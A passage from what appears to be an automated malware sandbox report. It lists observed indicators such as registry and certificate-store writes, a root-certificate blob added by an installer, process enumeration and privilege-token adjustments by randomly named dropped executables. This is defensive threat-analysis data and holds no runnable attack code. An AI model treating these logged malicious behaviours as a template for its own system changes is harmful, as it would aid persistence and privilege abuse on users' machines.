Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d75a031035819f compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy%5Cresources.pri\1d75a033ba4eb74\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n = "Assigned Access Lock app" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d75a03db8de77\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2 = "Windows Shell Experience" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CallingShellApp_cw5n1h2txyewy%5Cresources.pri\1d75a02fec6b56a\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\re = "Microsoft Corporation" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy%5Cresources.pri compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d75a03db8de77\a37dfe62 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d75a17566f896a\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_ = "Take a Test" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\1d75a0335b5d0ab\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\resource = "File Explorer application" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe%5Cresources.pri compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d781d71e731d27\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\resources.pri? ms-re = "Search the web and Windows" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AsyncTextService_8wekyb3d8bbwe%5Cresources.pri\1d75a039a93b17 compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d781d323729775\a37dfe62\@{C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\resources.pri? ms-reso = "Windows Hello Setup" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d75a032a505f68\a37dfe62\@{C:\Windows\SystemApps\Microsoft.Win32WebViewHost_cw5n1h2txyewy\resources.pri? m = "Desktop App Web Viewer" compattelrunner.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d75a0311147cb\a37dfe62\@{C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\resources.pri? ms-resource:///resourc = "Microsoft family features" compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\1d75a03421c99da\a37dfe62 compattelrunner.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{86D0A433-217B-4728-8E4C-E642625EF2A4} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D6D02056-CE11-40F8-8D38-D6FA4D12219D} Calculator.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3096 powershell.exe 3096 powershell.exe 3992 powershell.exe 3992 powershell.exe 3096 powershell.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe 1456 Sun038db98f99bf9a.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3232 Explorer.EXE 17280 RuntimeBroker.exe 20680 QUKHyXjH3qRKVkqx.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
pid Process 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 4716 dyEvj3hC2t7OMuwoWXdKUmK3.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5248 nxfL7_6XSgUfDUVDEan06Mbe.exe 5328 024wC3SO_qVtbE4Y9Lz5RQz9.exe 3940 control.exe 3940 control.exe 3940 control.exe 3940 control.exe 1440 E26D.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe 7160 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1708 svchost.exe Token: SeCreatePagefilePrivilege 1708 svchost.exe Token: SeShutdownPrivilege 1452 svchost.exe Token: SeCreatePagefilePrivilege 1452 svchost.exe Token: SeCreateTokenPrivilege 4064 Sun03d477f1a31.exe Token: SeAssignPrimaryTokenPrivilege 4064 Sun03d477f1a31.exe Token: SeLockMemoryPrivilege 4064 Sun03d477f1a31.exe Token: SeIncreaseQuotaPrivilege 4064 Sun03d477f1a31.exe Token: SeMachineAccountPrivilege 4064 Sun03d477f1a31.exe Token: SeTcbPrivilege 4064 Sun03d477f1a31.exe Token: SeSecurityPrivilege 4064 Sun03d477f1a31.exe Token: SeTakeOwnershipPrivilege 4064 Sun03d477f1a31.exe Token: SeLoadDriverPrivilege 4064 Sun03d477f1a31.exe Token: SeSystemProfilePrivilege 4064 Sun03d477f1a31.exe Token: SeSystemtimePrivilege 4064 Sun03d477f1a31.exe Token: SeProfSingleProcessPrivilege 4064 Sun03d477f1a31.exe Token: SeIncBasePriorityPrivilege 4064 Sun03d477f1a31.exe Token: SeCreatePagefilePrivilege 4064 Sun03d477f1a31.exe Token: SeCreatePermanentPrivilege 4064 Sun03d477f1a31.exe Token: SeBackupPrivilege 4064 Sun03d477f1a31.exe Token: SeRestorePrivilege 4064 Sun03d477f1a31.exe Token: SeShutdownPrivilege 4064 Sun03d477f1a31.exe Token: SeDebugPrivilege 4064 Sun03d477f1a31.exe Token: SeAuditPrivilege 4064 Sun03d477f1a31.exe Token: SeSystemEnvironmentPrivilege 4064 Sun03d477f1a31.exe Token: SeChangeNotifyPrivilege 4064 Sun03d477f1a31.exe Token: SeRemoteShutdownPrivilege 4064 Sun03d477f1a31.exe Token: SeUndockPrivilege 4064 Sun03d477f1a31.exe Token: SeSyncAgentPrivilege 4064 Sun03d477f1a31.exe Token: SeEnableDelegationPrivilege 4064 Sun03d477f1a31.exe Token: SeManageVolumePrivilege 4064 Sun03d477f1a31.exe Token: SeImpersonatePrivilege 4064 Sun03d477f1a31.exe Token: SeCreateGlobalPrivilege 4064 Sun03d477f1a31.exe Token: 31 4064 Sun03d477f1a31.exe Token: 32 4064 Sun03d477f1a31.exe Token: 33 4064 Sun03d477f1a31.exe Token: 34 4064 Sun03d477f1a31.exe Token: 35 4064 Sun03d477f1a31.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 812 Sun03ea09aa5c9686e5.exe Token: SeDebugPrivilege 3652 Sun0328255c4bce6fb.exe Token: SeDebugPrivilege 5600 taskkill.exe Token: SeCreateTokenPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeAssignPrimaryTokenPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeLockMemoryPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeIncreaseQuotaPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeMachineAccountPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeTcbPrivilege 5020 Hj5Pq1vV39n8G1DTpop2wdl2.exe Token: SeSecurityPrivilege 5020 